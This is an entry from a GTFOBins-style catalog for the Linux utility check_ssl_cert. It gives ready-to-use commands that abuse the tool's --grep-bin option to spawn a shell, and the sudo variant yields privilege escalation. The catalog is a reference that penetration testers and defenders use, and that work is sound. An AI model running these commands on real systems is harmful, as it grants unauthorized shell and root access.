Catalog GTFOBins

GTFO · Tool

check_ssl_cert

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

The shell will be invoked multiple times.

echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
chmod +x /path/to/temp-file
check_ssl_cert --grep-bin /path/to/temp-file -H x
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux

The shell will be invoked multiple times.

echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
chmod +x /path/to/temp-file
check_ssl_cert --grep-bin /path/to/temp-file -H x
Context
unprivileged
Native
shell
MITRE
T1059